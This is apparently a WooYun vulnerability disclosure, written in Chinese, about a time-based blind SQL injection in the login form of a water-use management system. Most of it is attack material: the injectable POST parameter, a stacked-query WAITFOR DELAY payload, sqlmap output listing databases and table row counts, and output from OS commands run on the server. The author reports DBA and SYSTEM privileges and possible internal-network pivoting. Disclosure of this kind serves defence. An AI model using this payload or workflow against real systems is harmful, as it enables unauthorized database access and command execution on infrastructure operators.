WooYun.org

**.**.**.**/bjwater2/login.jsp
登录框post基于时间的盲注
**.**.**.**:80/bjwater2/servlet/LoginSL (POST)
adminName=1p1sywpD&adminPWD=1&isDxLogin=true&loginType=pw_new
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [9]:
[*] bjwater
[*] bjwater2
[*] bjwater2_t
[*] BJWATER_SHOW
[*] bjwater_trans2
[*] master
[*] model
[*] msdb
[*] tempdb
八百万的数据，这应该是监测点什么的？没有跑数据，这些表名就跑了一天。
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: adminName (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: adminName=1p1sywpD';WAITFOR DELAY '0:0:5'--&adminPWD=1&isDxLogin=true&loginType=pw_new
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
Database: bjwater
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.V_WATERUSE_BASE | 8682624 |
| dbo.RD_PLAN_EXECUTE | 6403818 |
| dbo.TAP | 5115468 |
| dbo.PLAN_NORMAL | 4178197 |
| dbo.V_PLAN_NORMAL | 4178197 |
| dbo.WATERUSE_METER | 3174025 |
| dbo.PLAN_YEAR_NEW | 2683608 |
| dbo.WATERUSE | 2432582 |
| dbo.WATERUSE_BALANCED | 2196173 |
| dbo.RD_WATERUSE | 1184342 |
| dbo.WATERUSE_CHECK | 1083539 |
| dbo.WATERUSE_PLAN | 917326 |
| dbo.RD_PLAN_EXECUTE_2010S | 627775 |
| dbo.WATERUSE_ADJUST | 395789 |
| dbo.PLAN_NORMAL_C | 351444 |
| dbo.PLAN_YEAR_TEMP | 332471 |
| dbo.PLAN_EXECUTE_REMIND | 280423 |
| dbo.V_WATERUSE_ADJUST | 255668 |
| dbo.PLAN_TEMPORARY | 192146 |
| dbo.V_PLAN_TEMPORARY | 192146 |
| dbo.PLAN_YEAR_TEMP_C | 189787 |
| dbo.PLAN_PERENNIAL | 165871 |
| dbo.V_PLAN_PERENNIAL | 165871 |
| dbo.PLAN_EXECUTE_PRINT | 153610 |
| dbo.PLAN_YEAR | 104972 |
| dbo.COMPANY_TRACE | 77078 |
| dbo.METER | 62579 |
| dbo.COMPANY | 45222 |
| dbo.STAT_YEAR | 43329 |
| dbo.V_STAT_YEAR | 43327 |
| dbo.RD_STAT_YEAR | 43302 |
| dbo.RATION_ITEM_INFO | 40088 |
| dbo.LOGIN_LOG | 40081 |
| dbo.RATION_BASE_INFO | 34304 |
| dbo.V_WATERUSE_2005 | 29829 |
| dbo.WATERUSE_2005 | 29829 |
| dbo.S_WATERUSE | 27192 |
| dbo.PURVIEW_CLIENT | 25659 |
| dbo.WATERUSE_IMPORT | 24843 |
| dbo.WATERUSE_IMPORT2 | 23143 |
| dbo.WELL | 22569 |
| dbo.METER_TRACE | 13912 |
| dbo.PLAN_ADJUST_REASON | 12548 |
| dbo.FEE_MONTH_REPORT | 11576 |
| dbo.CHARGABLE_FEE | 11326 |
| dbo.PURVIEW | 9013 |
| dbo.PLAN_2006_INFO | 7861 |
| dbo.WF_YEARINFO | 3907 |
| dbo.PLAN_COMPANY_BASE_INFO | 3634 |
| dbo.S_PLAN_NORMAL | 3177 |
| dbo.TECH | 2790 |
| dbo.RD_TECH | 2719 |
| dbo.LOCKED_TABLE | 2270 |
| dbo.REUSED_WATER_YEAR | 1968 |
| dbo.S_STAT_YEAR | 1748 |
| dbo.PLAN_AGRO | 1680 |
| dbo.dinge | 1537 |
| dbo.OVERFEE | 1330 |
| dbo.STAT235 | 1298 |
| dbo.DM | 1186 |
| dbo.DESCRIPTION | 1128 |
| dbo.S_BIGCOMPANY | 860 |
| dbo.S_TECH | 840 |
| dbo.NOTICE | 793 |
| dbo.COMPANY_FEE_INFO | 774 |
| dbo.REUSED_WATER | 702 |
| dbo.OVER_FEE_REPORT | 660 |
| dbo.daxingstat | 633 |
| dbo.S_REUSED_WATER | 471 |
| dbo.NONPLAN | 344 |
| dbo.FEE_CHECK | 326 |
| dbo.ADMIN | 240 |
| dbo.FUNCTIONS_CLIENT | 230 |
| dbo.S_OVER_FEE_REPORT | 192 |
| dbo.PLAN_JSB | 168 |
| dbo.YEAR_REPORT2 | 168 |
| dbo.FUNCTIONS | 152 |
| dbo.YEAR_REPORT | 150 |
| dbo.SAVE_WATER | 149 |
| dbo.S_IMAGE | 141 |
| dbo.RW_OTHER_QR | 135 |
| dbo.RD_OVERFEE | 125 |
| dbo.FUNCTIONS_CLIENT_TABLE | 99 |
| dbo.JSB_WATERKIND | 96 |
| dbo.shishu | 88 |
| dbo.WF_BASEINFO | 74 |
| dbo.REPORT_HEAD | 70 |
| dbo.BASETABLE_PERIOD | 48 |
| dbo.S_SAVE_WATER | 48 |
| dbo.S_YEAR_REPORT | 45 |
| dbo.COMPRESS_RATIO | 39 |
| dbo.RW_SIGHT_QR | 37 |
| dbo.TECH11 | 31 |
| dbo.FOUR_RATE | 29 |
| dbo.SF_YEARINFO | 24 |
| dbo.PLAN_COMPUTE_DESCRIPTION | 19 |
| dbo.SF_BASEINFO | 8 |
| dbo.S_GDP_WATER | 2 |
+------------------------------+---------+
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
command standard output:
---
IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**
IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**

IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**
IPv4 し䁗 . . . . . . . . . . . . : **.**.**.**
涉及内网，并且是dba权限，system权限（记录没找到，就不贴了）
可内网渗透，手里没有好用的马，点到为止了。